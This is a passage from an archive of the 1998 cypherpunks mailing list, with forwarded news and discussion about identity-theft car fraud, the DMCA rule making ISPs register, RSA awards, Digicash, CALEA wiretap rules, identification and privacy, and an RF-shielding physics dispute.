commission-happy salesperson. Within a week, they say, the car will most
likely be in a container bound for resale on foreign shores.

"The problem is growing on a monthly basis," said John Bryan, a Los Angeles
County sheriff's captain who runs a regional anti-car-theft unit.

Bryan estimated that members of his Taskforce for Regional Autotheft
Prevention, or TRAP, arrested about 60 people in 1997 who were running such
scams.

One of last year's victims was Los Angeles County Supervisor Yvonne
Brathwaite Burke and her husband, William.

In her case, Burke said a con artist took her name from the newspaper and
paid a Georgia jeweler to run a credit check on her to obtain more
information. She said the man then obtained a driver's license in William
Burke's name and went on a spending spree.

Using the Burkes' credit information, the man bought four Yamaha WaveRunner
personal water vehicles and a BMW and tried to purchase a Mercedes-Benz and
Ford Thunderbird.

"We were getting bills in the mail every day," Burke said. "It was driving
me crazy."

She said the man was finally caught when he brought the BMW back to the
dealership to have a trailer hitch installed so he could pull the
WaveRunner behind the car.

In another case last year, authorities said a man established a dummy real
estate company to obtain personal credit histories, then used the
information to make more than $1 million in fraudulent purchases, including
several cars.

Bryan said another scam involved fraudulent applications for car purchases
at a San Gabriel Valley dealership. In that case, investigators seized
eight cars and believe as many as 40 more were purchased and illegally
sold.

The thieves generally don't shop for bargains either, Bryan said.

"They go for Mercedeses, BMWs, Lexuses, you name it."

Bryan said the thieves are typically well-dressed--sometimes even in
suits--and have a calm demeanor as they "shop" for a car.

"They walk in there looking like they can afford it," he said. "They know
what they're doing."

Bryan said the average price of a stolen car is about $60,000, and that
most of those who have been arrested are suspected of stealing numerous
cars.

The thieves usually make tens of thousands of dollars' profit on a single
sale.

Because cases are time-consuming and difficult to prove, Bryan said, an
offender is often charged with only one theft.

The crimes could result in several charges, including grand theft auto and
credit card fraud, punishable by a minimum of three years in prison,
according to a spokesman for the district attorney's office.

Popular markets for the stolen vehicles include China, numerous republics
of the former Soviet Union and the United Arab Emirates, police said.

People who have had their identities stolen and used to purchase the cars
are not liable, Bryan said.

Burke said, even though she was in a position to put pressure on
authorities to solve the case, she spent months trying to clean up her
credit.

"It was a nightmare," she said. "And it could happen to anybody."

Copyright 1998 Los Angeles Times.


--------------------------------NOTICE:------------------------------
ISPI Clips are news & opinion articles on privacy issues from
all points of view; they are clipped from local, national and international
newspapers, journals and magazines, etc. Inclusion as an ISPI Clip
does not necessarily reflect an endorsement of the content or opinion
by ISPI. In compliance with Title 17 U.S.C. section 107, this material is
distributed free without profit or payment for non-profit research
and educational purposes only.
---------------------------------------------------------------------------

ISPI Clips is a FREE e-mail service from the "Institute for the Study
of Privacy Issues" (ISPI). To receive "ISPI Clips" on a regular bases
(up to 3 - 8 clips per day) send the following message  "Please
enter [Your Name] into the ISPI Clips list: [Your e-mail address]" to:
ISPIClips@ama-gi.com  .

The Institute for the Study of Privacy Issues (ISPI) is a small
contributor-funded organization based in Victoria, British Columbia
(Canada). ISPI operates on a not-for-profit basis, accepts no
government funding and takes a global perspective.

ISPI's mandate is to conduct & promote interdisciplinary research
into electronic, personal and  financial privacy with a view toward
helping ordinary people understand the degree of privacy they have
with respect to government, industry and each other and to likewise
inform them about techniques to enhance their privacy.

But, none of this can be accomplished without your kind and
generous financial support. If you are concerned about the erosion
of your privacy in general, won't you please help us continue this
important work by becoming an "ISPI Supporter" or by taking out
an institute Membership?

We gratefully accept all contributions:

  Less than $60    ISPI Supporter
          $60 - $99    Primary ISPI Membership (1 year)
      $100 - $300    Senior ISPI Membership (2 years)
More than $300    Executive Council Membership (life)

Your ISPI "membership" contribution entitles you to receive "The ISPI
Privacy Reporter" (our bi-monthly 12 page hard-copy newsletter in
multi-contributor format) for the duration of your membership.

For a contribution form with postal instructions please send the following
message "ISPI Contribution Form" to ISPI4Privacy@ama-gi.com .

We maintain a strict privacy policy. Any information you divulge to ISPI
is kept in strict confidence. It will not be sold, lent or given away to
any third party.










****************************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address

or (un)subscribe ignition-point-digest email@address
****************************************************
www.telepath.com/believer
****************************************************

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Fri, 6 Nov 1998 21:31:42 +0800
To: cypherpunks@cyberpass.net
Subject: My first order of Business              (http://www.jesseventura.org/bbs/messages/3052.html) (fwd)
Message-ID: <v04020a2bb268a3e7b1cf@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Date:         Fri, 6 Nov 1998 06:56:20 -0500
Reply-To: Law & Policy of Computer Communications
              <CYBERIA-L@LISTSERV.AOL.COM>
Sender: Law & Policy of Computer Communications
              <CYBERIA-L@LISTSERV.AOL.COM>
From: Robbin Stewart <rstewart@INDY.NET>
Subject:      My first order of Business
              (http://www.jesseventura.org/bbs/messages/3052.html) (fwd)
Comments: To: robbin stewart <rstewart@indy3.indy.net>
To: CYBERIA-L@LISTSERV.AOL.COM

It appears that we've found a solution to spam. Somebody sent
"make money fast" type post to Jesse's web-based bulliten board and got
the following response.

Forwarded message:
> Subject: My first order of Business
>(http://www.jesseventura.org/bbs/messages/3052.html)
>
> My first order of Business
>
>
> [ Follow Ups ] [ Post Followup ] [ jesseventura Message Board ]
>
> -------------------------------------------------------------------------=
> -------
>
> Posted by Jesse Ventura on November 06, 1998 at 02:03:38:
>
> In Reply to: $$ posted by $$ on November 06, 1998 at 01:05:44:
>
> Is to rid the internet of spammers like this JERK. By the way we have =
> your IP and your interner provider will be contacted, enjoy your 6X9 =
> cell.=20
>

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Fri, 6 Nov 1998 21:32:28 +0800
To: cypherpunks@cyberpass.net
Subject: RSA Seeks Nominees for Awards & $10K Honors <FW>
Message-ID: <v04020a2cb268a433c3c0@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


X-Sender: vin@shell1.shore.net
Mime-Version: 1.0
Date: Fri, 6 Nov 1998 01:27:20 -0500
To: "John Young" <jya@pop.pipeline.com>, "Dave Farber" <farber@cis.upenn.edu>
From: Vin McLellan <vin@shore.net>
Subject: RSA Seeks Nominees for Awards & $10K Honors <FW>
Cc: cryptography@c2.net
Sender: bounce-dcsb@ai.mit.edu
Precedence: bulk
Reply-To: Vin McLellan <vin@shore.net>

	<fyi>

	RSA Data Security <http:www.rsa.com> invites industry and political
activists, netizens, and scholars to nominate individuals who should be
honored for their "outstanding contributions" to the field of cryptography.

	RSADSI annually awards three US$10,000 prizes to innovators and
leaders in the fields of Mathematics, Public Policy, and Industry. The
final selection is by a panel of academic and industry experts, but the
nomination process is open to all. Nominations for the 1999 Awards can be
made directly at <http://www.rsa.com/rsaawards/> anytime before 12/4/98.

	"The RSA Award in Mathematics recognizes innovation and ongoing
contributions to the field of cryptography.  The Committee seeks to reward
nominees who are pioneers in their field, and whose work has applied
value." Nominees should be affiliated with universities or research labs.

	The 1998 winner of the RSA Math Award was Dr. Shafrira Goldwasser,
who was also named to the RSA Professorship at MIT last year. Prof.
Goldwasser's pioneering work in number theory, complexity, and cryptography
has also won MIT's Grace Murray Hopper Award and the first Godel Prize.

	Congressman Bob Goodlatte (R-VA) -- primary sponsor of HR 696, the
Security and Freedom Thru Encryption (SAFE) Act -- was the 1998 winner of
the RSA Public Policy Award. This prize seeks to honor elected or appointed
officials, or activists associated with public interest groups, who have
made a "significant contribution" to the American policy debate about
cryptography over the previous calendar year.

	The RSA Award for Industry seeks to honor individuals or
organizations which have made outstanding contributions in commercial
applications of crypto -- "particularly those that provide clear value to
the end users" -- and demonstrated "ongoing innovation in their technology
and products."

	The 1998 winner was Netscape, source of SSL and a steady steam of
clever innovations for the denizens of the web. Taher ElGamal accepted for
Netscape.

	The three winners for 1999 will be announced at the 1999 RSA Data
Security Conference, which (having outgrown Nob Hill, to the regret of
many) is being held in San Jose, January 17-21. See:
<http://www.rsa.com/conf99>


-----
      Vin McLellan + The Privacy Guild + <vin@shore.net>
  53 Nichols St., Chelsea, MA 02150 USA <617> 884-5548
                         -- <@><@> --



For help on using this list (especially unsubscribing), send a message to
"dcsb-request@ai.mit.edu" with one line of text: "help".

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Fri, 6 Nov 1998 21:47:48 +0800
To: cypherpunks@cyberpass.net
Subject: ISPs now responsible for Pirated Material
Message-ID: <v04020a2eb268a6363cdb@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


X-Authentication-Warning: lpma.la-ma.org: majordom set sender to
owner-general@la-ma.org using -f
X-Sender: dkrick@pobox3.bbn.com
Date: Fri, 06 Nov 1998 07:29:38 -0500
To: general@la-ma.org
From: Doug Krick <dkrick@bbnplanet.com>
Subject: ISPs now responsible for Pirated Material
Mime-Version: 1.0
Sender: owner-general@la-ma.org
Precedence: bulk

http://www.news.com/News/Item/0,4,28357,00.html?st.ne.fd.mdh

Summary:  IF a local ISP doesn't register with the goverment, per a new law
Clinton signed this week, the ISP can be held legally responsible for any
pirated material that may be on their site.

Doug

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pgut001@cs.auckland.ac.nz (Peter Gutmann)
Date: Fri, 6 Nov 1998 04:45:47 +0800
To: cypherpunks@cyberpass.net
Subject: Re: TriSnakeoil questions
Message-ID: <91029670728883@cs26.cs.auckland.ac.nz>
MIME-Version: 1.0
Content-Type: text/plain



I wrote:
 
>I'm currently sitting in a booth at a Tandem user show directly opposite the 
>Atalla one.  If there's anything in particular which someone wants to ask 
>them, let me know and I'll see how knowledgeable their salesdroids are.  
 
I had a talk to them, it turns out that of the two different Atalla's, Atalla 
the company and John Atalla the person, the snake oil is being pushed by 
Atalla the person rather than Atalla the company.  The Atalla people knew as 
little about it as everyone else, and although they were careful with their 
replies I got the impression that they were about as impressed with TriStrata 
as others on this list are.  OTOH perhaps they were just depressed that I 
asked them about TriStrata instead of their RSA/3DES card :-).
 
[I have half a dozen brochures for this one, in every single brochure it's 
 called something different (SET accelerator, SSL accelerator, e-commerce 
 accelerator, <buzzword> accelerator) but once you get past the first few 
 application-specific paragraphs the rest is identical.  Covers all the bases 
 I guess.  Their white paper on why hardware crypto is better than software 
 crypto is a hoot too - "Hardware is cheaper" (obviously some new definition 
 of the word with which I wasn't previously familiar), "software crypto can't 
 be shared" (as opposed to hardware, which can be shared with a simple copy 
 command), etc.  Their products look pretty good, but everyone I talked to 
 complained about the price and was ready to jump on software alternatives]
 
Peter.
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Motyka <mmotyka@lsil.com>
Date: Sat, 7 Nov 1998 08:11:27 +0800
To: cypherpunks@EINSTEIN.ssz.com
Subject: Re: Grounding (fwd)
Message-ID: <3643312D.5C2@lsil.com>
MIME-Version: 1.0
Content-Type: text/plain



OMYGAWD!

I can see that I'll have to give up soon.

> The solutions to the wave equation inside the cavity have a real part ~0
> in the exponent.
***
It's not a question of a Schroedingers Wave Equation, it's a question of
Maxwell's Equations. 
***

Yeah I've got my old copy of Jackson. MTW too, for all the good it did
me. Maxwell's equations can be used to form a wave equation too. I only
bring up the Schroedinger equation because the solutions to simple
particle-in-a-box examples are easy to generate and easy to visualize.
Anyone who even began a decent Physics program should have done many of
these. The probability function for the Quantum example *looks like* the
amplitude for the EM example...analogy is a good tool.

> The boundary condition at the inside surface of the
> copper box splices together the solutions in the cavity and inside the
> conductor.

***
What conductor? The shell is equipotential unless you're trying to play
head
games with me so there follows there can be no current flow through it
except radialy to the outside of the sphere.
***
DC, Yes. AC, things are happening.

To solve the diffeq's for an EM wave incident on a conducting surface
you have to make the solutions !inside! the conductor match the
solutions outside the conductor. Only if the conductor is *perfect* does
your assumption of nothing going on inside the conductor make sense.

BTW - the skin depth for Cu at 100MHz is about 0.00026". The skin depth
is proportional to f^(-0.5).

In brief, here's what happens to the wave incident on a copper sheet:
Wave is incident on surface
Most of the wave is reflected
  the better the conductor, the more is reflected
the portion that is not reflected is attenuated in the conductor ( loss
)
any amplitude on the other surface of the sheet radiates energy.

It should be obvious that, if the conductor is good, there will be very
little amplititude inside the conductor, low loss reflection. Further,
that 4 mils of Cu should provide ~80 dB loss in even the tiny amount
that is not reflected at the inner surface. At 100MHz. I haven't solved
this system for many years and I'm not inclined to go back to it now.
Take my word for it : a little RF can get through a copper sheet but
only a *very* little. It's the finite conductivity that alters the
simple scenario.

***
Let's walk through it using your model....

The spark gap generates sparks and that builds up free electrons in the
space inside the sphere (whether it is gas filled or a vacuum is
irrelevant). As that charge builds up it will be all of one type,
electrons.
Now the electrons repel each other and therefor move in a circular
motion
with the spark gap as the center. They strike the surface of the sphere
and
tunnel through to the outside surface where they reside. The amount of
charge at any one point is related to the curvature of the surface at
that
point. Since a sphere is constant curvature the charge will be evenly
distributed. It will continue to build up so long as you supply power to
the
spark gap. In an ideal world it will get bigger and bigger. In the real
world at some point insulation breaks down and normal current flow takes
place.
***
Wild!

Forget all this, this patchwork of pieces doesn't hold together as a
description of the physical problem. If it helps, forget about the spark
gap. Waves waves waves. Start with a wave packet in the box. Don't worry
about how it got there. Worry about keeping it there.

Best regards Jim,
Mike




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bob@tokensystems.com
Date: Sat, 7 Nov 1998 01:17:59 +0800
To: cypherpunks@toad.com
Subject: legislation -- read
Message-ID: <199811061627.JAA16550@token1.tokensystems.com>
MIME-Version: 1.0
Content-Type: text/plain



Dear Fellow Webmaster:

The recent events and pending legislation that have rocked the web are
sure to place new restrictions on the business. We think this is a
very good solution.

Check it out http://209.203.80.254/exe/tpromo1.cgi?7026131

Or call us if you have any questions.
Bob
818-559-3484





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Kawika Daguio" <KDAGUIO.ABASP1.ABAOF40@aba.com>
Date: Sat, 7 Nov 1998 00:29:38 +0800
To: <rah@shipwright.com>
Subject: Re: RE: Digicash bankruptcy
Message-ID: <s642d445.034@aba.com>
MIME-Version: 1.0
Content-Type: text/plain



Much of Digicash's problems came about as a result of its inventors worldview and dreams.   These primary problems were caused by the same factors that created the impetus for their development.

The business constraints that David Chaum attempted to impose on everyone interested in his technology included social theory driven restrictions.   He really wanted to change not only how future payment systems worked but also wanted to change how current payment mechanisms and general social interaction and commerce worked in the future.  I share some of his concerns, but do not find his solution satisfactory.

I also remain unconvinced that point to point protection of sensitive information including credit cards numbers solves anything.   Infosec as practiced in the WebWorld leaves much to be desired.  Point to point encryption + weak and misleading naming (domain names) + near meaningless authentication + untrustworthy practices =  slightly worse to slightly better than nothing at all.

I am extremely patient (5-50 year time horizon) and remain hopeful that time, money, and proper attention by experienced risk and operations managers will resolve many of the weaknesses with current infrastructure and business models.

Kawika

>>> "Phillip Hallam-Baker" <hallam@ai.mit.edu> 11/05/98 09:07PM >>>
Phil is right in much of what he says but in a couple of cases he
is wrong.

Regarding the 'vortex of buzz technologies', VRML, network computers
and push are certainly not hot properties at the moment, neither is
interactive TV - but the Web was designed as the antithesis of 
Interactive TV. The root failure of Interactive TV was the assumption
that the world wanted to spend its time passively consuming the dross
pumped out through a 1000 channel 120" TV which would dominate the home.

I would also like to add Java onto the pile. Java today is simply
what C++ should have been. It does not revolutionize the programming
industry, it simply provides what some people think is an object
oriented programming environment and removes some of the worst 
legacy clutter of C.

Cryptographic payment systems are here - in the form of credit card
transactions over SSL. The main problem with SET and its competitors
is that SSL works a little too well.

That is not to say that there is no future for SET. SSL and credit
cards are unlikely to make the leap from the consumer market to the
business to business market. SET provides an ideal platform to 
integrate the use of the credit card infrastructure for business
payments.

The other area where I would disagree is over protocols. HTTP is
quite radically different to FTP in that it is a computer client
to computer server protocol. The metaphor of FTP is rumaging through
a filing cabinet. The HTTP and Web mechanism employs a locator.
Admittedly there was nothing to stop a text mode Web being created
in 1982 but nobody did so.

What is true is that the time taken for Internet technologies to move
to market is very slow. Much of the HTTP technology that just reached 
the market was proposed in '92 and '93. 

Finaly I have difficulty regarding Digicash as being all that socially
responsible. Chaum's problems had a lot to do with the business terms
he insisted on. What he had was a technology which allowed an improvement
to a payment system. He imagined he had a monopoly on the only feasible
solution. He was very baddly mistaken. The monopoly rents he demanded
were more than the market was willing to pay for a working and deployed
system - let alone for a patent license.

		Phill





For help on using this list (especially unsubscribing), send a message to
"dcsb-request@ai.mit.edu" with one line of text: "help".




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sat, 7 Nov 1998 00:31:57 +0800
To: cypherpunks@cyberpass.net
Subject: IP: New Law Requires ISPs to Register & Rat
Message-ID: <v04020a31b268cb9405e2@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Delivered-To: ignition-point@majordomo.pobox.com
X-Sender: believer@telepath.com
Date: Fri, 06 Nov 1998 08:11:11 -0600
To: believer@telepath.com
From: believer@telepath.com
Subject: IP: New Law Requires ISPs to Register & Rat
Mime-Version: 1.0
Sender: owner-ignition-point@majordomo.pobox.com
Precedence: list
Reply-To: believer@telepath.com

Source:  http://www.news.com/News/Item/0,4,28357,00.html?st.ne.1.head

Law enlists ISPs in
              piracy fight
              By John Borland
              Staff Writer, CNET News.com
              November 4, 1998, 5:30 p.m. PT

              A new set of federal regulations
              requires Internet service providers to
              register immediately with the U.S.
              government, lest they be held legally
              liable for pirated material that flows
              through their servers.

              The new rules, which went into effect
              yesterday, flow from the Digital
              Millennium Copyright Act, which was
              signed by President Clinton last week.
              The law shields ISPs from being sued
              for copyright infringement based on
              their subscribers' postings, so long as
              they register with the U.S. Copyright
              Office. The provision is the product of
              negotiations over the original copyright
              law, and was accepted reluctantly by
              service provider industry
              representatives.

              "This isn't what we would have
              wanted. It's a Washington approach to
              a simple kind of problem," said Dave
              McClure, executive director of the
              Association of Online Professionals, a
              trade group that represents ISPs.

              Copyright holders had complained that
              some ISPs were not responding to
              warnings about pirated material
              located on their servers, or were
              claiming ignorance even after being
              notified.

              "Copyright holders pushed for a
              requirement that a person actually be
              physically designated to receive
              information about infringement,"
              McClure said.

              The new law fills a legal gap left by
              the passage of the Communications
              Decency Act in 1996. Under that law,
              ISPs cannot be held liable for
              slanderous or libelous material that is
              posted on their services. That
              provision, which has been tested
              several times in court already,
              specifically excludes copyright issues.

              The new regulations require each ISP
              to designate a point-person to receive
              complaints about copyright
              infringement, and to send that
              information to the federal copyright
              office along with a $20 filing fee. The
              person's name and contact information
              also must be displayed prominently on
              the ISP's Web site.

              The rules went into effect November 3.
              Any unregistered ISP can legally be
              held liable for pirated material on its
              site from now on.

              The Copyright Office rules are only an
              interim step in the new law's
              implementation. Regulators will draft
              permanent rules and host a public
              comment period later this year or early
              next year.
    -----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------


****************************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address

or (un)subscribe ignition-point-digest email@address
****************************************************
www.telepath.com/believer
****************************************************

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sat, 7 Nov 1998 00:57:16 +0800
To: cypherpunks@cyberpass.net
Subject: Identification and Privacy are not Antinomies
Message-ID: <v04020a33b268cf3de214@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Delivered-To: DIGSIG@LISTSERV.TEMPLE.EDU
MIME-Version: 1.0
Date:         Fri, 6 Nov 1998 12:39:53 -0200
Reply-To: Digital Signature discussion <DIGSIG@LISTSERV.TEMPLE.EDU>
Sender: Digital Signature discussion <DIGSIG@LISTSERV.TEMPLE.EDU>
From: Ed Gerck <egerck@LASER.CPS.SOFTEX.BR>
Subject:      Identification and Privacy are not Antinomies
To: DIGSIG@LISTSERV.TEMPLE.EDU

     Identification and Privacy are not Antinomies


This is a comment to the article "Not for Identification Purposes" by
Richard Sobel, of 8/12/98, and a reply by Jorge Cortell-Albert, all
referenced at http://cyber.law.harvard.edu/filter/101598/letters.html

>From the inherent conflict seen in these articles, it is quite
apparent that one could profit from a new perspective when dealing
with identification issues today. Not only because of historical
examples of misuse or because the Clinton administration is proposing
a national ID card that may compromise privacy, but because we need
to harmonize needs with tools. Clearly, there is an escalating need
to identify -- likewise, there is an increasingly easy access to
information and massive cross-checking of data based on global
indexes.

Biometrics, contrary to expressed opinion such as Cortell-Albert's,
is not self-secure and cannot protect what it forthrightly denies:
privacy. One does not even have to recall the proverbial truck that
hits the subject, in order to realize that biometrics is also
perishable. In fact, biometrics just highlights the basic paradox of
privacy versus security -- where one is asked to forfeit privacy in a
rather permanent way in order to gain some transient level of
security.

Are identification and privacy antinomies, like freedom and slavery?
Is there an unresolvable conflict between both security and privacy?
Current expressed opinion, such as Sobel's and Cortell-Albert's, says
"yes" to both questions.

As we have no real solution within the current level of
understanding, one needs a fresh look into identification and
identity. To exercise the solution, Internet protocols can provide a
good practical arena accessible to all and truly international --
thus, I will use it in this exposition as an example. However, it
will be clear that I could likewise use anything else -- even the US
Government's current proposal for a national ID card.

Identification is often understood as an act of identifying, or of
establishing an identity. Identity is usually defined as "the
distinguishing character or personality of an individual" [1].

Of course, such definitions cannot be applied on the Internet. Any
mention to "identity" or "identity authentication" on the Internet is
a mere tag for something else, such as an individual's purported
attribute. Certainly, without any physical contact with an individual
or even without any way to directly verify it.

It is simply not possible to speak of "identity" or "identification"
as a dictionary defines it, over the Internet. All legal and
technical studies that call for or depend on such equivalence are
misleading. Any such "identity" or "identification" can be faked,
repudiated or are specifically unwarranted (e.g. by commercial CAs)
to relying-parties over the Internet.

That the US INS accepts UK birth (naming) certificates in order to
certify immigration status for its own policy of regulation, does not
mean that the INS is acting to "confirm" the legitimacy of the name,
or organise the UK namespace.

So, the first conclusion is that acceptance of an identity by a
recipient does not make that identification more veritable to others
... though it is often interpreted so, especially when a third
document is issued by the recipient and publicly known.

Sure, there is a bar on the standard of the {UK,...} authorities who
the INS respects sufficiently for its own activities. But INS
confirmation (or rather "use") confers no status on the original
document unless the INS policy wished to make such representation
explicit. Which would involve legal responsibilities that escalate
like those that would derive from a blank signed cheque.

Thus, this is also an unsolved problem in the 3D-world, outside the
Internet. On 15th April 1997, The Daily Telegraph, a UK quality
newspaper, reported on Alan Reeve [2] -- a convicted criminal and
triple killer who was described as "friendly, caring, dependable and
loving" by his fiance when he was arrested under false identity in
Ireland.

Clearly, the indeterminacy of "identity" on the 3D-world is itself a
reason to doubt any extension of such credentials to the Internet
[3,4]. Which is made worse by the often neglected fact that the
certificate user (e.g., "relying-party") is not privy to the contract
between the CA and the certificate subscriber [3]. Further, CAs
effectively contradict any possible public rights that
relying-parties might claim, by declaring in the CA's CPS (the
governing law) that a certificate has no warranted content to
relying-parties [3]. Moreover, on the Internet, we also need to
identify hosts, routing, software, etc. -- not just humans.

Thus, the basic Net disconnect is that the Internet is essentially
that wire that goes to your computer! Anything else that you imagine
is just this -- you imagine.

Even if you receive a message that looks like mine, from my address,
should you believe 100% it is mine? "Doubt until you have proof". Of
course, the degree of proof required depends on what is at stake and
what is your cost -- however, the best proof is to be considered the
one that leaves the concerned parties with no doubts [cf. 2]. Of
course, the law may require a higher degree of proof (eg, when buying
firearms you cannot just do it over e-mail -- you need to present a
legal identity, a legal connection to yourself and perhaps also an
address as a further legal connection).

The same disconnect happens in the 3D world, because who is to affirm
that the presented ID card is the "right one"? Or, that the person
depicted in the card is the "right one"? Who is Alan Reeve?

However, as given in [5,6], there is an answer to the
privacy/security paradox. And, practical tools that may help the
Clinton administration (or, any government, company or individual) to
decrease costs without resorting to privacy burdens over the
puported beneficiaries.

The answer begins by a question: What is "to identify"? The study
shows that "to identify" is to look for connections. Thus, in
identification we look for logical or natural connections -- we look
for coherence. The work shows that not identity but coherence is the
general metric for identification and deduces more than 64 basic
types of identification. More coherence and more identification types
mean stronger identification, even if anonymous.

Identification can thus be understood not only in the sense of an
"identity" connection, but in the wider sense of "any" connection.
Which one to use is just a matter of protocol expression, need, cost
and (very importantly) privacy concerns.

A further benefit is that it allows clear definitions for a large
number of new anonymous identification types, sorely needed on the
Internet, for e-commerce and to decrease costs inccurred with fraud,
in general, but without compromising one's privacy just to tank the
car or buy a lunch.

I note that even though motivated by the Internet, as a practical
arena, the concepts reported in [5,6] can be applied to improve any
identification method -- including the present proposal by the US
Government.


Cheers,

Ed Gerck

============================================
References:

[1] Merriam-Webster Dictionary, http:www.m-w.com

[2] http://www.mcg.org.br/auth_b1.htm

[3] http://www.mcg.org.br/certover.pdf

[4] http://www.mcg.org.br/cert.htm

[5] http://www.mcg.org.br/coherence.txt

[6] http://www.mcg.org.br/coherence2.txt


______________________________________________________________________
Dr.rer.nat. E. Gerck                     egerck@novaware.cps.softex.br
http://novaware.cps.softex.br

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 7 Nov 1998 01:20:37 +0800
To: cypherpunks@toad.com
Subject: FCC Wiretap Rule
Message-ID: <199811061635.LAA24230@camel14.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



FCC has issued its Notice of Proposed Rulemaking on 
CALEA wiretap provisions, approved on October 22:

   http://jya.com/fcc98282.htm  (243K)

Zipped:

   http://jya.com/fcc98282.zip  (67K)

Lengthy discussion of petitioners (CDT, EFF, telcos, others) 
objections and FBI's responses.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Sat, 7 Nov 1998 01:59:04 +0800
To: Robert Hettinga <cypherpunks@cyberpass.net
Subject: Re: ISPs now responsible for Pirated Material
In-Reply-To: <v04020a2eb268a6363cdb@[139.167.130.246]>
Message-ID: <199811061720.MAA28321@mail1.panix.com>
MIME-Version: 1.0
Content-Type: text/plain




>http://www.news.com/News/Item/0,4,28357,00.html?st.ne.fd.mdh
>
>Summary:  IF a local ISP doesn't register with the goverment, per a new law
>Clinton signed this week, the ISP can be held legally responsible for any
>pirated material that may be on their site.
>
>Doug
>

"Register Communists -- Not ISPs"

DCF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Sat, 7 Nov 1998 03:17:21 +0800
To: "Cypherpunks (E-mail)" <cypherpunks@cyberpass.net>
Subject: RE: dbts: Privacy Fetishes, Perfect Competition, and the Foregone	 (fwd)
In-Reply-To: <5F152E6E8E6FD21195DF00104B2425AD02B24B@yarrowbay.chaffeyhomes.com>
Message-ID: <v04011700b268e1bc518a@[206.189.103.230]>
MIME-Version: 1.0
Content-Type: text/plain



At 4:52 PM -0500 11/5/98, Matthew James Gering wrote:
>> Robert Hettinga wrote:

>> Further more, even in a free-market there will exist
>> black markets.
>
>Provided you don't corrupt the meaning of free-market to include any
>possible black market, then yes, there will *always* be a black market. It
>can be made rather insignificant however.

	Assuming your definition of "free market" is "a market without
regulation", you can't have a black market in a free market since a black
market is trade in violation of regulations.

	In other words, a Black market is when you trade either illegal
goods illegally, or legal goods illegally.

	If there are no illegal goods, and there is no regulations limiting
trading, then the black market cannot exist.

	Unless I am missing some context here.

>> The aspect of a free-market is that there is no consequence from
>> such actions (unless you want to admit to allowing corporations to have
>> their own hit squads).
>
>And again you pervert the meaning of free market. I'm tired arguing that
>subject with you, go read a book.

	Remember that line from _A_Fish_Called_Wanda_ about apes and philosopy?
--
"To sum up: The entire structure of antitrust statutes in this country is a
jumble of economic irrationality and ignorance. It is a product: (a) of a
gross misinterpretation of history, and (b) of rather nave, and certainly
